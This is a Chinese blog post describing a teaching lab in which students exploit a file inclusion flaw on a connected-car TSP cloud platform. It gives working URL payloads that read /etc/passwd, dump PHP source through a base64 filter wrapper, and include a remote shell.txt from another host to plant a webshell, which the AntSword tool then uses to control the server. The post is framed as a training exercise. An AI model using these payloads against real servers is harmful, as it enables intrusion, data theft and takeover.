智能网联汽车信息安全实训平台-TSP云平台的文件包含漏洞实验

最新推荐文章于 2024-06-07 17:24:52 发布
最新推荐文章于 2024-06-07 17:24:52 发布
阅读量2.4k 收藏 3
点赞数
文章标签: php 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TICPSH/article/details/109764559
版权

 

目录

一、测试对象

二、教学目的

三、详细介绍

四、依赖软件工具

五、依赖硬件工具

六、实验步骤

1.搜索到TSP云平台的文件包含漏洞

2.使用本地文件包含来读取本地文件隐私数据

3.使用远程文件包含来植入木马

4.通过菜刀或中国蚁剑来连接木马,远程控制服务器

智能网联汽车信息安全实训平台的文件包含漏洞实验,测试方案覆盖车机软件、车载通信、车内智能终端设备、车内总线等检测环境。

一、测试对象

TSP云平台

二、教学目的

通过指导学生上机实践,让学生学习利用TSP云平台的文件包含漏洞进行攻击的基本原理和操作过程,了解除汽车本身外,TSP平台可能存在的安全威胁,并加强安全防护意识。

三、详细介绍

本实验介绍一种对TSP云平台进行文件包含漏洞利用的基本过程。利用本地文件包含查看服务器端的隐私文件,利用远程文件包含向服务器上传木马,并使用中国蚁剑连接木马,从而实现对服务器的远程控制。

四、依赖软件工具

中国蚁剑

一个网站管理工具,也常用于授权人员对网站的安全渗透测试。本实验使用这个工具连接在远程文件包含中植入的网站木马。

五、依赖硬件工具

Windows系统PC,Ubuntu系统工控机。

六、实验步骤

实验流程和网络拓扑

1.搜索到TSP云平台的文件包含漏洞

打开TSP云平台登录页面,观察到URL的参数filename的值是一个login.php,是一个页面,因此推测该平台存在文件包含漏洞。

http://192.168.9.135/include.php?filename=login.php
代码使用了文件包含函数

使用以下命令测试,可以确定漏洞确实存在。

http://192.168.9.135/include.php?filename=/etc/passwd
验证存在文件包含漏洞

2.使用本地文件包含来读取本地文件隐私数据

本实验在test目录内放了两个key.php文件。使用以下命令读取key1.php,可以得到解析后的内容。

http://192.168.9.135/include.php?filename=test/key1.php
可以直接读取服务器端的文件内容

使用同样的方法读取key2.php,发现不能直接读取到key信息。

http://192.168.9.135/include.php?filename=test/key2.php
无法看到完整的源代码

为了获取到源代码的内容,可以利用php伪协议,读取key2.php经过base64加密后的数据。

http://192.168.9.135/include.php?filename=php://filter/read=convert.base64-encode/resource=test/key2.php
显示编码后的php文件源代码

将base64密文解码,就可以得到源码中隐藏的key。

看到解码后的源码内容

3.使用远程文件包含来植入木马

除了读取服务器端的本地文件,还可以利用远程文件包含向服务器上传木马,从而控制服务器。本实验已经在本地部署了一个apache服务器,并定义了木马生成文件 “shell.txt”。

上传木马

访问以下网址来上传木马:

http://192.168.9.135/include.php?filename=http://10.88.20.117/shell.txt
植入木马

4.通过菜刀或中国蚁剑来连接木马,远程控制服务器

打开中国蚁剑,点击右键,选择 “添加数据”,在 “URL地址” 中输入上一步上传木马使用的URL,连接密码为 “shell”。点击 “测试连接”,显示连接成功后,点击左上角 “添加” 来确认添加此连接。

使用中国蚁剑连接木马

双击该连接,可以看到网站后台的所有文件,并且可以进行新建目录、上传文件等操作。

实现对服务器的远程控制

 

 更多资讯欢迎关注“上海控安研发与转化功能型平台”

上海控安
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
车载测试:车功能组件及安全测试策略
manbskjabgkb的博客
07-17 1013
端系统应重点关注应用安全、系统安全、数据安全等,“管”端安全以通信安全及边界安全为主,车端安全关注于硬件安全、通信安全、升级安全及供应链安全,APP安全则关注于应用安全、数据安全、运行安全及隐私安全,针对具体如图所示。车系统一般会包括TSP系统、TBOX、IVI、APP、ECU、TPMS等组件,在测评时一般需要选择安全通用要求,对位于平台的TSP系统需要选择计算安全扩展要求,但对TBOX、IVI、APP、ECU、TPMS的测评则需要进一步细化测评指标要求。APP的安全性对车辆安全显得尤为重要。
ParkManagementSystem:(智能停车APP&智能车场)TSP智能共享平台端):包括了停车场相关所有管理
03-11
一·app端的登陆,人脸识别,修改信息等,需要后台的部署。后台是在Eclipse开发中,建议使用eclipse运行,同时下载Spring Boot插件完成项目的部署;部署后,后台的WebService也同时发布成功。。二·部署成功,访问三·用户在页访问启动,表示的络。四·车牌识别:点击应用程序的用户头像,再点击拍照,拍的照片会通过WebService传输到后台,通过WebSocket把识别的车牌发到页面。五·地址说明:在停车场帐户中main.jsp两个地址是摄像头的视频址,用ip摄像头(一个app)实现项目的端口为8089,netty服务器用了9999; app调用WebService接口直接访问pc端的ip地址,定义为手机开景点给手机,确保位于同一段。netty服务器和WebSocket的交互使用本地主机访问,则是同一台电脑打开。否则映射到外
知物由学 | 一种新型自研白盒密钥算法,让攻击者无迹可寻
10-11 1199
知物由学 | 一种新型自研白盒密钥算法,让攻击者无迹可寻 随着信息化的发展,数据安全显得越来越重要,因此对数据的存储和传输进行加密操作逐渐进入大众视线。数据加密的过程中必然涉及由一系列参数组成的密钥,而密钥正是攻击者所垂涎的目标,这是由于相比于破解加密算法,盗取密匙要来得更为容易,也是直通数据“仓库”的捷径之一。 因此,密钥安全称之为“数据安全的基础”也不为过,尤其是在不可信的移动端环境中,常见的有获取了最高权限的 Android、iOS 设备。 本文基于移动端密钥使用和存储的痛点,介绍了一种自研的白盒加密
明显漏洞和隐藏漏洞_万字长文:智能汽车十大络安全攻击场景_零基础白帽子教学
最新发布
程序员三九的博客
06-07 751
某知名电动汽车厂商安全总监结合实际经验,归纳总结了智能汽车10大攻击场景,以及每个场景的攻击手段和防御方法。
TSP平台软件漏洞分析与安全测试.pdf
07-16
TSP平台软件漏洞分析与安全测试.pdf
上海控安:车载总线渗透测试分析,构建络安全防护体系
TICPSH的博客
12-06 8314
上海控安开发渗透测试工具,以帮助整车企业快速实施所需的渗透测试,发现目标系统潜在的相关安全漏洞,从而为后续的络系统安全设计及改进提供依据,最终保障目标系统的络安全。
智能汽车信息安全测试解决方案
经纬恒润的官方博客
12-23 1581
概述 为满足日益严格的国内外法规和标准要求,应对愈发严峻的信息安全风险,智能汽车通常集成越来越多的信息安全检测和防御措施。而相关的安全措施集成到部件和整车之后,能否发挥有效的防护效果,需要通过严格的信息安全测试进行验证和确认。 经纬恒润信息安全团队针对智能汽车提供一系列的信息安全测试解决方案,涵盖软件、单部件、系统和实车等各阶段的信息安全测试服务,为信息安全策略的正确实施保驾护航。 信息安全测试咨询服务 经纬恒润提供的信息安全测试咨询服务涵盖:OTA、IDPS、SecOC、IPSec和TLS等信息
智能汽车数据分类分级实践指南-2023.02.pdf
02-20
智能汽车数据分类分级是当前智能汽车行业关注的重点,这一实践指南主要针对智能汽车在数据安全领域的挑战,提供了一套系统性的方法论。随着汽车行业的电动化、化和智能化趋势,智能汽车产生的数据量...
2022年智能汽车信息安全研究报告.pdf
08-17
该报告为智能汽车信息安全研究提供了一个全面的视角,涵盖了智能汽车信息安全发展趋势、智能汽车行业发展、智能汽车安全趋势、信息安全法规标准动态、智能汽车信息安全事件聚焦、智能汽车...
智能汽车数据共享安全要求》-报批稿(1).pdf
06-30
智能汽车数据共享安全要求》-报批稿
TSP平台解决方案.pdf
09-16
整车控制策略,智能
智能汽车技术基础最新版课件-智能汽车环境感知技术
04-27
智能汽车环境感知技术
智能汽车预期功能安全场景库001-101.pdf
03-13
智能汽车预期功能安全场景库001-101
信息安全技术 信息系统通用安全技术要求_智能汽车信息安全技术要求与测试方法...
weixin_39827315的博客
11-24 363
今晚(周三)20:00,「智车科技·智车播」第五期直播,邀请了北京邮电大学电子科学与技术专业(物方向)工学博士——吴超博士,他将为大家分享《智能汽车信息安全技术要求与测试方法》。吴超博士吴超,北京邮电大学电子科学与技术专业(物方向)工学博士、高级工程师、中国消费品质量安全促进会(汽车领域)专家,现就职于重庆车辆检测研究院有限公司,从事方向为:智能汽车V2X技术与信息安全...
TSP的架构浅谈
IT深耕十余载,大道之简
03-28 9000
随着车技术的发展,车TSP(Telematics Service Provider)在汽车安全、驾驶行为、智能导航等方面发挥着重要的作用。本文将主要讨论车TSP的技术架构方面,包括车TSP的组成、通信协议、数据管理等方面的内容。
车载测试—TBox
flower_life的博客
07-04 383
APP--TSP--Tbox交互流程图 TBox功能
怎么样实现车辆信息安全
usstmiracle的博客
03-01 623
1 车载IDS正成为持续络安全保护的核心要素 持续的信息安全风险管理正成为VTA的要求。通过IDS车载入侵检测可以为整个车队提供信息安全保护。但是,分布式IDS的指导原则是什么? 为了满足UNECE.WP29法规要求,整车生产商和车队运营商必须对其车辆的络安全采取一种基于风险的评估方法。合国第155号条例(UN R155)以及ISO/SAE 21434规定,需要在车辆全生命周期内对整个车队进行持续的络风险管理。因此,在未来,持续的状态监测和基于风险的安全措施将成为汽车络安全的重要组成部分。
智能-浅谈基于PKI的车应用服务安全
IT深耕十余载,大道之简
10-12 2016
以上就是今天要讲的内容,本文仅仅简单介绍了PKI在车上简单的使用场景,而PKI其它详细应用能力还要随着V2X的应用场景下沉及国家行业规范的合规要求,还有很多需要深入探讨研究领域。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值